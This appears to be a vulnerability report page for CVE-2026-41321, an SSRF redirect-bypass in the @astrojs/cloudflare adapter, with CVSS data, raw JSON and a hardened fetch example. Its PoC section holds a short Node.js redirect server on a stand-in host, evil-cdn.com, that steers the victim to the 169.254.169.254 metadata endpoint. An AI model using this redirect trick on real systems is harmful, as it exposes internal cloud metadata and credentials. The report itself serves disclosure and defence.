Security Vulnerability Report
CVE-2026-41321 CVSS 2.2 LOW

Published: 2026-04-24 18:16:29
Last Modified: 2026-04-27 18:53:00

Description

@astrojs/cloudflare is an SSR adapter for use with Cloudflare Workers targets. Prior to 13.1.10, the fetch() call for remote images in packages/integrations/cloudflare/src/utils/image-binding-transform.ts uses the default redirect: 'follow' behavior. This allows the Cloudflare Worker to follow HTTP redirects to arbitrary URLs, bypassing the isRemoteAllowed() domain allowlist check, which only validates the initial URL. This vulnerability is caused by an incomplete fix for CVE-2025-58179. This vulnerability is fixed in 13.1.10.

CVSS Details

CVSS Score
2.2
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

@astrojs/cloudflare < 13.1.10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// PoC Concept: SSRF via Redirect Bypass
// Attacker controls: http://evil-cdn.com (assumed whitelisted)
// Target: http://169.254.169.254/latest/meta-data/

// 1. Malicious Server Configuration (Node.js example)
const http = require('http');
const server = http.createServer((req, res) => {
  console.log('Request received from victim');
  // Respond with a redirect to an internal resource
  res.writeHead(302, { 'Location': 'http://169.254.169.254/latest/meta-data/' });
  res.end();
});
server.listen(80);

// 2. Vulnerable Request Flow in Astro
// The victim app requests: http://evil-cdn.com/image.jpg
//
// Code path in @astrojs/cloudflare:
// - isRemoteAllowed('http://evil-cdn.com/image.jpg') -> Returns True (Domain is allowed)
// - fetch('http://evil-cdn.com/image.jpg', { redirect: 'follow' })
//   -> Receives 302 from evil-cdn.com
//   -> Automatically follows to http://169.254.169.254/latest/meta-data/
//   -> Returns internal metadata to the attacker
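The description and the code path above both come down to one defect: the allowlist is checked once, on the first URL, and fetch() then follows 3xx responses on its own. The hardened form below is an added example written for this report; it is not the upstream fix in 13.1.10 and not Astro's code. It assumes a hypothetical fetchRemoteImage() wrapper, a minimal stand-in for isRemoteAllowed() that matches exact hostnames, and an injected fetch implementation with constructed canned responses so it runs offline; the hostnames images.example.com and not-allowed.example.net are constructed. The pattern is to request with redirect: 'manual', and re-run the allowlist check on every Location target before the next hop, with a hop cap.

```javascript
// Added example (not @astrojs/cloudflare's code): re-validate every redirect hop
// instead of letting fetch() follow redirects automatically.
const MAX_REDIRECTS = 5;

// Minimal stand-in (assumption) for Astro's isRemoteAllowed(): http(s) only, exact hostname match.
function isRemoteAllowed(urlString, allowedHosts) {
  let url;
  try { url = new URL(urlString); } catch { return false; }
  if (url.protocol !== 'http:' && url.protocol !== 'https:') return false;
  return allowedHosts.includes(url.hostname);
}

// Hypothetical wrapper: fetch a remote image while checking the allowlist at every hop.
// fetchImpl is injectable so the example can run with a canned fetch; defaults to global fetch (Node 18+).
async function fetchRemoteImage(urlString, allowedHosts, fetchImpl = globalThis.fetch) {
  let current = urlString;
  for (let hop = 0; hop <= MAX_REDIRECTS; hop++) {
    if (!isRemoteAllowed(current, allowedHosts)) {
      throw new Error(`blocked: ${current} is not in the remote image allowlist`);
    }
    // redirect: 'manual' hands the 3xx response back instead of following it.
    const res = await fetchImpl(current, { redirect: 'manual' });
    if (res.status >= 300 && res.status < 400) {
      const location = res.headers.get('location');
      if (!location) throw new Error(`redirect without Location from ${current}`);
      // Resolve relative Location values against the current URL, then loop to re-check it.
      current = new URL(location, current).toString();
      continue;
    }
    return res;
  }
  throw new Error(`too many redirects starting from ${urlString}`);
}

// Constructed offline stand-in for fetch(): canned responses keyed by URL, plus a log of what was requested.
function makeResponse(status, headers, body) {
  const map = new Map(Object.entries(headers).map(([k, v]) => [k.toLowerCase(), v]));
  return { status, headers: map, body };
}

function makeFakeFetch(table) {
  const log = [];
  const fetchImpl = async (url) => {
    log.push(url);
    const entry = table[url];
    if (!entry) return makeResponse(404, {}, null);
    return makeResponse(entry.status, entry.headers || {}, entry.body ?? null);
  };
  return { fetchImpl, log };
}

// Constructed scenario: one redirect that stays on the allowlisted host, one that leaves it.
const ALLOWED_HOSTS = ['images.example.com'];
const CANNED = {
  'https://images.example.com/old.png': { status: 302, headers: { Location: '/new.png' } },
  'https://images.example.com/new.png': { status: 200, body: 'fake-png-bytes' },
  'https://images.example.com/hop.png': { status: 302, headers: { Location: 'https://not-allowed.example.net/x' } },
  'https://not-allowed.example.net/x': { status: 200, body: 'must never be fetched' },
};

async function runDemo() {
  const { fetchImpl, log } = makeFakeFetch(CANNED);
  // Same-host redirect: allowed, follows to /new.png and returns its body.
  const ok = await fetchRemoteImage('https://images.example.com/old.png', ALLOWED_HOSTS, fetchImpl);
  // Off-host redirect: the second hop fails the allowlist check before any request is sent to it.
  let blockedError = null;
  try {
    await fetchRemoteImage('https://images.example.com/hop.png', ALLOWED_HOSTS, fetchImpl);
  } catch (e) {
    blockedError = e.message;
  }
  return { okBody: ok.body, blockedError, fetched: log };
}

runDemo().then((r) => console.log(JSON.stringify(r, null, 2)));
```

The request log is the useful check: the unlisted host never appears in it, because the allowlist decision is made on the resolved Location value before the next fetch, not on the URL the application started with. A real deployment would also cap response size and reject non-image content types, but those controls are outside this report.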

References

https://github.com/withastro/astro/security/advisories/GHSA-88gm-j2wx-58h6

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41321", "sourceIdentifier": "[email protected]", "published": "2026-04-24T18:16:28.783", "lastModified": "2026-04-27T18:53:00.053", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "@astrojs/cloudflare is an SSR adapter for use with Cloudflare Workers targets. Prior to 13.1.10, the fetch() call for remote images in packages/integrations/cloudflare/src/utils/image-binding-transform.ts uses the default redirect: 'follow' behavior. This allows the Cloudflare Worker to follow HTTP redirects to arbitrary URLs, bypassing the isRemoteAllowed() domain allowlist check which only validates the initial URL. This vulnerabiity is caused by an incomplete fix for CVE-2025-58179. This vulnerability is fixed in 13.1.10."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.2, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.7, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/withastro/astro/security/advisories/GHSA-88gm-j2wx-58h6", "source": "[email protected]"}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-88gm-j2wx-58h6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}